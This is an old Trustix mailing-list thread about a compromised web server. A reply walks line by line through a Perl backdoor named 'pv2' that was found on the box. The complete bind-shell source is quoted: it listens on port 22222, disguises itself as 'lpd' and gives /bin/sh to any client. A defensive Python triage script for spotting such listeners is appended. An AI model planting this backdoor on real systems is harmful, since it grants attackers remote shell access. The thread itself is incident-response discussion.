Barbara M. wrote:
> On Tue, 15 Nov 2005, Vidar Tyldum Hansen wrote:
>
>
>>>A friend who has an httpd server based on TSL 2.2 has received this
>>>mail:
>>>
>>>-------------------------------------------
>>>Subject: Your_host_have_been_attacked
>>>
>>>Your host have been attacked by pv script. Look on netstat -anp for
>>>process listen on 4123 port
>>>
>>>-------------------------------------------
>>>
>>>
>>>He tells me that there is a process listening on port 4123 and another on
>>>22222. Stopping httpd and killing the process that owns the daemons seems
>>>to temporarily "solve" the problem.
>>>He said that those processes are owned by httpd.
>>>He is now busy rebuilding a new box to migrate the data to, so he asked
>>>me to collect info on the "pv script".
>>>Any hints?
>>
>>Name of process? Where does it live on the filesystem?
>
>
> I haven't seen the server; he tells me that the process is named "perl"
> and found a perl script in /tmp
>
>
>>What does a 'strings filename' reveal?
>
> Can you explain this?
If the program is a binary (compiled) file, then "strings" will dump the
textual strings from the binary for you (try strings /bin/ls).
>>Go through the access-logs for apache. My guess is that there was a
>>badly written PHP app on it and that led to remote execution
>>vulnerabilities.
>
>
> Suggested.
> Reply: "Yes, but parsing some GB of logs without an idea of what exactly
> to search for ..."
Grep for the name of the running script, in this case "pv2".
>>The fact that all the parasites ran as httpd and not root points very
>>hard in that direction.
> ---------pv2------------------------
> #!/usr/bin/perl
> use Socket;
These are settings:
> $port=22222;
> $proto=getprotobyname('tcp');
> $cmd="lpd";
> $system='/bin/sh';
> $0=$cmd;
This opens the port specified above and waits for connections on that port.
> socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
> setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die
> "setsockopt: $!";
> bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
> listen(SERVER, SOMAXCONN) or die "listen: $!";
> for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
This connects STDIN, STDOUT and STDERR of the executed program to the
connected client.
> open(STDIN, ">&CLIENT");
> open(STDOUT, ">&CLIENT");
> open(STDERR, ">&CLIENT");
> system($system);
> close(STDIN);
> close(STDOUT);
> close(STDERR);
> }
The net effect being: telnet to port 22222 on the box, and get a shell
as the user running the pv2 script.
Cheers,
--
Morten
_______________________________________________
tsl-discuss mailing list
[email protected]
http://lists.trustix.org/mailman/listinfo/tsl-discuss
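A triage check for the pattern discussed in this thread, added here as an example and not code from the thread: the pv2 script sets `$0` to "lpd", so `netstat -anp` shows a harmless-looking name, but `/proc/<pid>/exe` still points at the perl binary, and the listener runs as the web-server user on a port httpd never uses. The `netstat` excerpt, PIDs and process snapshot below are constructed; `snapshot_from_proc` reads the same fields from a live `/proc`.

```python
import os, pwd, re
from pathlib import Path

# Constructed `netstat -anp` excerpt modelled on the thread: httpd on 80, a
# pv2-style listener on 22222 disguised as "lpd", and a second perl listener on 4123.
NETSTAT_SAMPLE = """\
Proto Recv-Q Send-Q Local Address   Foreign Address  State   PID/Program name
tcp        0      0 0.0.0.0:80      0.0.0.0:*        LISTEN  812/httpd
tcp        0      0 0.0.0.0:22222   0.0.0.0:*        LISTEN  4871/lpd
tcp        0      0 0.0.0.0:4123    0.0.0.0:*        LISTEN  4902/perl
tcp        0      0 0.0.0.0:22      0.0.0.0:*        LISTEN  640/sshd
"""
# Constructed process snapshot (hypothetical PIDs); on a live box use snapshot_from_proc().
PROC_SAMPLE = {
    812:  {"user": "root",  "exe": "/usr/sbin/httpd", "comm": "httpd"},
    4871: {"user": "httpd", "exe": "/usr/bin/perl",   "comm": "lpd"},
    4902: {"user": "httpd", "exe": "/usr/bin/perl",   "comm": "perl"},
    640:  {"user": "root",  "exe": "/usr/sbin/sshd",  "comm": "sshd"},
}
LISTEN_RE = re.compile(r"^tcp6?\s+\d+\s+\d+\s+\S+:(\d+)\s+\S+\s+LISTEN\s+(\S+)")

def parse_listeners(netstat_text):
    """Return {port: (pid, program)} for LISTEN rows; pid is None when netstat shows '-'."""
    listeners = {}
    for line in netstat_text.splitlines():
        m = LISTEN_RE.match(line)
        if m:
            port, owner = int(m.group(1)), m.group(2)
            pid, _, prog = owner.partition("/")
            listeners[port] = (int(pid) if pid.isdigit() else None, prog)
    return listeners

def snapshot_from_proc(pid):
    """Live helper (not run here): owner, real executable and comm straight from /proc."""
    p = Path("/proc") / str(pid)
    return {"user": pwd.getpwuid(p.stat().st_uid).pw_name, "exe": os.readlink(p / "exe"),
            "comm": (p / "comm").read_text().strip()}

def triage(netstat_text, procs, web_users=("httpd", "apache"), expected_ports=(80, 443)):
    """Flag web-user listeners on unexpected ports and names that hide the real executable."""
    findings = []
    for port, (pid, prog) in parse_listeners(netstat_text).items():
        info = procs.get(pid)
        if info is None:
            continue  # no snapshot for this pid (e.g. netstat printed '-')
        if info["user"] in web_users and port not in expected_ports:
            findings.append((pid, port, f"{info['user']} listening on unexpected port"))
        if info["comm"] != Path(info["exe"]).name:  # $0 changes comm, never the exe link
            findings.append((pid, port, f"name '{prog}' hides exe {info['exe']}"))
    return findings
```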